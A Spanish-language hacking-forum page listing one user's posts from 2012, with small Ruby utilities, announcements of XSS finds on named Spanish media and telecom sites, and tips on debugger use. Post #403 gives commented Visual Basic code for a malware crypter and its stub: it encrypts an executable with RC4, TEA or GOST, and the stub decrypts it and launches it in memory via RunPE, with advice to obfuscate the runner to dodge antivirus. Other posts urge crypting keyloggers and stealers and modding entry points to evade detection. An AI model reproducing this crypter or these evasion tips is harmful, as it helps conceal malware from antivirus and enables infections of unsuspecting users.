Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Sanko

#401
Ruby / Easy PortScanner - Sanko
Septiembre 04, 2012, 06:10:58 PM
Practicando un poco con los sockets y tcpsockets

Código: ruby
#Easy PortScanner | Ruby
#Coded by Sanko
require 'socket'
print "Escriba aqui el host \n"
host = gets.chomp #Damos valor a host
print "Escriba aqui el puerto \n"
puerto = gets.chomp #Damos valor a Puerto

socket = TCPSocket.new( host, puerto) #Conectamos el socket
if !socket
print "El host : " + host + ",tiene el puerto : " + puerto + " cerrado  \n"
#Si socket no conecta "CERRADO" o a veces error XD
else
print "El host : " + host + ",tiene el puerto : " + puerto + " abierto  \n"
#Si socket conecta "ABIERTO"
end


Ejecutado :

#402
Correjido , puse datosphptools cuando arriba declare Datos como string , asi que sustituyelo por Datos.
AUn asi ya he correjido el code.
#403
Dudas y pedidos generales / Re:Problema con crypter
Septiembre 03, 2012, 08:24:28 PM
Bueno ya mire la code que me pasaste por privado.
Tienes un jaleo de strings... , das name a una string y al darle remplace (porque el src es de un tutorial) debes cambiar ciertas cosas del code y antes de mirar detalle a detalle es mejor reconstruir de 0 xd.
Aparte estas usando un stub interno que para modding es mucho más complicado para el user que lo moddea y sobretodo cuando no tiene mucha idea acerca del tema , es mejor que separes tu stub y mandes al crypter leerlo como binario.

Asi que te he cambiado ciertas partes del code y he puesto aclaraciones a cada lado y respetanto tu change icon y tu generador en md5 claro.
Asi que aqui te escribo : examinar , encriptar y stub.

Examinar :

Código: vb
With CD ' Abrimos el CommonDialog
.DialogTitle = " Seleccione el archivo a encriptar " ' esto es para que te salga el nombre de la ventanita
.Filter = "Aplicaciones EXE|*.exe" ' esto solo para poder elegir archivos EXE
.ShowOpen ' para que se abra la ventana de búsqueda
End With ' finalizamos CommonDialog
If Dir(CD.Filename) = vbNullString Then Exit Sub ' Si no hay ruta , saltara error
Text1.Text = CD.Filename ' para que se quede la ruta grabada en el Text1.text


Encriptar :

Código: vb
Dim Stub As String ' Señalamos la palabra stub como String , no tiene que ser siempre esa palabra
If Text1.Text = vbNullString Then ' Si no hay nada , dira que no esta presente
    MsgBox "El Archivo no esta presente", vbInformation, Me.Caption
    Exit Sub ' Salimos
End If ' Y cerramos la condicional if

With CD ' Abrimos commonDialog
    .DialogTitle = "Seleccione la ruta donde desea guardar el Archivo"
    .Filter = "Aplicaciones EXE|*.exe" 'Solo .exe
    .ShowSave ' Ventana de guardado
End With

Open App.Path & "\" & "Stub.exe" For Binary As #1 ' Abrimos el que sera el Stub.exe
    Stub = Space(LOF(1)) ' Lo abrimos en Binario
    Get #1,  , Stub ' Vamos a el
Close #1 ' Cerramos Binario


If Check2.Value = 1 Then
Call ChangeIcon(App.Path & "\Stub.exe", Text3.Text) 'utilizo la funcion changeico con la ruta del stub y del icono a ponerle
End If

Dim EOF As String ' Declaramos EOF como string
If Check1.Value = 1 Then EOF = ReadEOFData(Text1.Text) ' Si pulsamos check1 se leera el file para saber si es necesario escribir eof
Dim BIN As String ' Marcamos bin como string
Open Text1.Text For Binary As #1 ' abrimos el contenido o ruta de text1 en binario
    BIN = Space(LOF(1)) ' indicamos
    Get #1, , BIN ' vamos al binario del archivo
Close #1 ' cerramos el binario

Dim RC4 As New clsRC4, Tea As New clsTea, Gost As New clsGost' Indicamos las clases correspondientes al nombre
Dim Encriptacion As String ' declaramos la palabra encriptación como string

If Option1.Value = True Then ' Si la opcion 1 es elejida...
    BIN = RC4.EncryptString(BIN, Text2.Text) ' Se encripta la clave de text2 con rc4
    Encriptacion = "RC4" ' declarando la encriptacion como RC4
End If ' cerramos condicional´

If Option2.Value = True Then ' Si se elije la opción 2
    BIN = Tea.EncryptString(BIN, Text2.Text) ' se encripta la clave del text2 en tea
    Encriptacion = "Tea" ' indicamos que Teaes el tipo de encriptacion
End If ' cerramos condicional

If Option3.Value = True Then ' Si se elije la opción 3
    BIN = Gost.EncryptString(BIN, Text2.Text) ' se encripta la clave del text2 en gost
    Encriptacion = "Gost" ' indicamos que Gost es el tipo de encriptacion
End If ' cerramos condicional

Dim Datos As String ' indicamos los datos como string

Datos = Stub & "[DELIMITADOR]" & BIN & "[DELIMITADOR]" & Encriptacion & "[DELIMITADOR]" & Text2.Text & "[DELIMITADOR]" ' detras de cada 'funcion ponemos el delimitador para separar

If Check1.Value = 1 Then Call WriteEOFData(CD.Filename, EOF) ' si seleccionamos el check1 el EOF se escribe

Open CD.Filename For Binary As #1 ' Abrimos la ruta del CD en binario
    Put #1, , Datos & "CorecciondeCode" ' Ponemos los datos en binario con un segundo delimitador
Close #1 ' cerramos binario
MsgBox " encriptado correctamente " ' Hacemos que salga un mensaje informando de que se encripto corr nuestro archivo
End Sub ' Finalizamos


Stub : (Ahora externo)

Código: vb
Dim TutorialSplit() As String ' marcamos string
TutorialSplit() = Split(Datos, "[DELIMITADOR]") ' damos split e indicamos el delimitador de antes

Dim RC4 As New clsRC4, Tea As New clsTea, Gost As New clsGost' Indicamos las clases correspondientes al nombre

If TutorialSplit(2) = "RC4" Then ' si el "TutorialSplit(2) es igual a la encriptacion RC4
    TutorialSplit(1) = RC4.DecryptString(TutorialSplit(1), TutorialSplit(3)) ' el rc4 desencripta lo cifrado en el cliente
End If ' cerramos condicional

If TutorialSplit(2) = "Tea" Then ' Indicamos Tea como tipo de encriptacion
    TutorialSplit(1) = Tea.DecryptString(TutorialSplit(1), TutorialSplit(3)) ' desencriptamos con tea el código cifrado
End If ' cerramos condicional

If TutorialSplit(2) = "Gost" Then ' Indicamos gost como tipo de encriptacion
    TutorialSplit(1) = Gost.DecryptString(TutorialSplit(1), TutorialSplit(3)) ' desencriptamos con gost el código cifrado
End If ' cerramos condicional

Dim byteDatos() As Byte ' Indicamos Datos como Byte
    byteDatos() = StrConv(TutorialSplit(1), vbFromUnicode)

Call NSRVJUF(App.Path & "\" & App.EXEName & ".exe", xDatos(), Command) ' llamamos al runPE , en tu caso NSRVJUF , pero deberias buscarte
' otro runPE o ofuscar un poquito este que esta quemao, muy quemao.


Espero haberte ayudado pues , ya he testeado cambiando el code en tu src y rula perfecto , 0 fallos.
Daré como solucionado el tema , si te surje otra duda solo tienes que revivir el post comentando de nuevo.
#404
Dudas y pedidos generales / Re:Auditoria informática
Septiembre 03, 2012, 11:47:45 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas compañeros.

Tengo que realizar un trabajo sobre una auditoria informática, mi pregunta es donde puedo encontrar un cuestionario completo sobre seguridad informática....

el informe me lo tengo que invertar y ect... pero necesito un cuestionario bien completo.

Gracias!
Haber , en que quedamos , tienes que realizar un cuestionario o un informe? aclarate es totalmente distinto.
vuelve a plantear la duda ya que me resultaría raro que te manden hacer un INFORME INVENTADO...
PD : El que algo quiere algo le cuesta , busca información sobre la seguridad informática, documentate que existe un buscador internacional llamado google y luego si no entiendes algo tendras derecho a preguntar...No esperes que te den el trabajo masticado , esfuerzate.
#405
Dudas y pedidos generales / Re:Problema con crypter
Septiembre 02, 2012, 04:55:38 PM
el error '13' suele ser que colocaste o bien el runpe mal o la encriptación no lo puedo saber si no publicas tu código...
Publica el code del crypter y yo me encargaré de mirartelo pues.
#406
Hacking ShowOff / XSS Stored - TeleMadrid.es
Septiembre 02, 2012, 02:21:00 AM
#407
Ruby / IP Resolver - Sanko
Septiembre 01, 2012, 08:10:14 PM
Bueno poco a poco voy aprendiendo ruby , asi que les dejo aquí un resolver de ip.
por el momento :

Código: ruby
#IP Resolver
#By sanko
require "resolv"
print "[+] IP Resolver - Sanko [+] \n\n"

puts "Escribe aqui el host :"
host = gets.chomp
print "El host elejido es " + host + " \n"

mostrarip = Resolv.getaddress(host)
print "\n - la ip de " + host + " es: " + mostrarip + " \n"


y una imagen :



Saludos
#408
Hacking ShowOff / Re:XSS Reflected Intereconomia.com
Septiembre 01, 2012, 05:23:53 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tiene más tiempo ese XSS...
Yo hace un tiempo encontré un SQLi y llegué a sacar los datos de la VPN que usan para conectarse, pero lo dejé abandonado xD
XD , pues tal vez porque reporte el mismo día que lo vi y aun sigue...
#409
Ruby / Texto -> Hexadecimal | En Ruby | Sanko
Septiembre 01, 2012, 05:17:36 PM
Código: ruby
#Encriptador de texto a hexadecimal
#Coded by Sanko
print "Escribe aquí el texto a encriptar : "
STDOUT.flush
texto = gets.chomp
var = 0
resultado = ""
while var <= texto.length-1 do
textos = texto.slice(var..-1).unpack('U')[0]
resultado += textos.to_s(16)+" "
var+=1
end
puts resultado


imagen :


#410
Ruby / RubyMonk - Página interactiva de aprendizaje
Septiembre 01, 2012, 04:49:25 PM
Aqui os dejo una página de aprendizaje de ruby de manera interactiva con el usuario.
Lo único malo para algunos es que esta en Ingles pero es comprensible y si no pues usa traductor...
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Aprendan mucho...
#411
Has probado dandote permisos de administrador?
Si no nose que te puede pasar pero puedes crearte una maquina virtual con xp
#412
Hay muchas digamos "versiones" o "modificaciones" de ollydbg , yo en mi win7 x64 utilizo este y no me crea ningun problema :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
si acaso ejecutalo como administrador , y si lo necesitas para el modding de binario aqui te dejo un video que hice hace tiempo de como cambiar el entry point :



Aun asi no te recomiendo usar ese método , quita los av's de pacotilla pero endurece los av's que realmente importan.
#413
Hacking ShowOff / XSS Reflected Intereconomia.com
Agosto 30, 2012, 05:42:58 PM
XSS Reflected a intereconomia , una conocida web de un canal de televisión en el que solo salen fascistas criticando al pueblo.

#414
Python / Re:[PyQT4] LocateIP 0.1
Agosto 28, 2012, 05:48:25 PM
ta bueno man , gracias por traerlo.
#415
Hacking ShowOff / Re:Taringa.net XSSed by Pr0ph3t
Agosto 27, 2012, 01:01:49 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
bro.. no es que dude pero pero una imagen cualquiera la edita..

Tenes que mostrar el POC sino es lo mismo..

Ademas no es la gran vulneravilidad como para esconderla tanto..

Tomalo con onda no...
Man no es una vulnerabilidad grave pero siempre te hace gracia encontrar xss en páginas que se suponen que estan muy bien controladas.
XD , bonita man.
#416
Dudas y pedidos generales / Re:Sobre vb6
Agosto 26, 2012, 11:12:10 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola , mi duda es la siguiente: se puede geerar un exe desde source? Es de decir yo compilo un proyecto y al abrir ese proyecto compilado abra otro exe
suponganse creo un programa que al apretar un commandbutton genere otro exe
Se puede hacer?

Pd: alguien sabe que paso con masters hackers? Desaparecio?
Claro que se puede , asi funcionan los builders solo necesitas saber algo de arrays , aun asi creo recordar que ANTRAX tiene un tutorial de crear un builder , si no lo encuentras me avisas pues y te codeo un source de ejemplo.
#417
Hacking ShowOff / Re:XSS Reflected Movistar
Agosto 24, 2012, 08:55:21 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
jeje esto me da gracia. parece que todas fueron hechas en el mismo lugar son You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login de Uruguay y hace un tiempo me paso' esto : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Hace un tiempo y te podría volver a pasar ahora xd ya que ahi sigue.


#418
Hacking ShowOff / Re:XSS Reflected Movistar
Agosto 24, 2012, 07:25:30 PM
Buena esa xd
#419
Hacking ShowOff / RTV Castilla y León - XSS
Agosto 24, 2012, 06:52:20 PM
Pues nada un "amigo" ( para nada ) mio trabaja alli y me pase y encontre esto :



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#420
todo y digo todo el malware DEBERIA ser encriptable.
Esta claro que los crypters no se inventarón solo para indetectar troyanos.
Hasta el momento todos los keyloggers y stealers que he probado SON encriptables , de seguro hay alguno NO  encriptable , pero entonces significa que el programador es un lelo.